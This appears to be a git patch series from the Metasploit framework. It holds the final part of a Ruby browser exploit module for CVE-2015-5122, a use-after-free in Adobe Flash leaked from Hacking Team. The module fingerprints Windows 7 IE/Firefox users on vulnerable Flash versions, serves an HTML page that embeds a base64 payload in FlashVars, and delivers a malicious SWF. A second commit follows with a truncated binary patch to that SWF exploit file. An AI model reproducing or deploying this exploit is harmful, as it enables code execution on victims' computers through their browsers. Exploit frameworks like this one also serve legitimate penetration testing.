+      'Name'                => 'Adobe Flash opaqueBackground Use After Free',
+      'Description'         => %q{
+        This module exploits an use after free on Adobe Flash Player. The vulnerability,
+        discovered by Hacking Team and made public on its July 2015 data leak, was
+        described as an Use After Free while handling the opaqueBackground property
+        7 setter of the flash.display.DisplayObject class. This module has been tested
+        successfully on:
+
+        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203,
+        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
+      },
+      'License'             => MSF_LICENSE,
+      'Author'              =>
+        [
+          'Unknown', # Vulnerability discovered on HackingTeam info leak
+          'juan vazquez' # msf module
+        ],
+      'References'          =>
+        [
+          ['CVE', '2015-5122'],
+          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html']
+        ],
+      'Payload'             =>
+        {
+          'DisableNops' => true
+        },
+      'Platform'            => ['win'],
+      'Arch'                => [ARCH_X86],
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :arch    => ARCH_X86,
+          :os_name => lambda do |os|
+            os =~ OperatingSystems::Match::WINDOWS_7
+          end,
+          :ua_name => lambda do |ua|
+            case target.name
+            when 'Windows'
+              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
+            end
+
+            false
+          end,
+          :flash   => lambda do |ver|
+            case target.name
+            when 'Windows'
+              return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.203')
+            end
+
+            false
+          end
+        },
+      'Targets'             =>
+        [
+          [ 'Windows',
+            {
+              'Platform' => 'win'
+            }
+          ]
+        ],
+      'Privileged'          => false,
+      'DisclosureDate'      => 'Jul 06 2015',
+      'DefaultTarget'       => 0))
+  end
+
+  def exploit
+    @swf = create_swf
+
+    super
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Request: #{request.uri}")
+
+    if target_info[:os_name] == OperatingSystems::Match::WINDOWS_81 && target_info[:ua_ver] == '11.0'
+      print_warning("Target setup not supported")
+      send_not_found(cli)
+      return
+    end
+
+    if request.uri =~ /\.swf$/
+      print_status('Sending SWF...')
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+      return
+    end
+
+    print_status('Sending HTML...')
+    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+  end
+
+  def exploit_template(cli, target_info)
+    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    target_payload = get_payload(cli, target_info)
+    b64_payload = Rex::Text.encode_base64(target_payload)
+    os_name = target_info[:os_name]
+
+    if target.name =~ /Windows/
+      platform_id = 'win'
+    end
+
+    html_template = %Q|<html>
+    <body>
+    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+    <param name="movie" value="<%=swf_random%>" />
+    <param name="allowScriptAccess" value="always" />
+    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
+    <param name="Play" value="true" />
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
+    </object>
+    </body>
+    </html>
+    |
+
+    return html_template, binding()
+  end
+
+  def create_swf
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5122', 'msf.swf')
+    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
+
+    swf
+  end
+end

From 299978d0e2df8003f97c673a55f66c9894fc267a Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sat, 11 Jul 2015 00:36:32 -0500
Subject: [PATCH 0726/1013] Put again old exploiter

---
 data/exploits/CVE-2015-5122/msf.swf           | Bin 43247 -> 43267 bytes
 .../exploits/CVE-2015-5122/Exploiter.as       | 116 ++----------------
 2 files changed, 11 insertions(+), 105 deletions(-)

diff --git a/data/exploits/CVE-2015-5122/msf.swf b/data/exploits/CVE-2015-5122/msf.swf
index ae20d7f534af3eb3c4c3a40e6314885e5c092202..7a333645563f5ebf6bf37f5b917a2cf63fb6dc67 100755
GIT binary patch
delta 43171
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
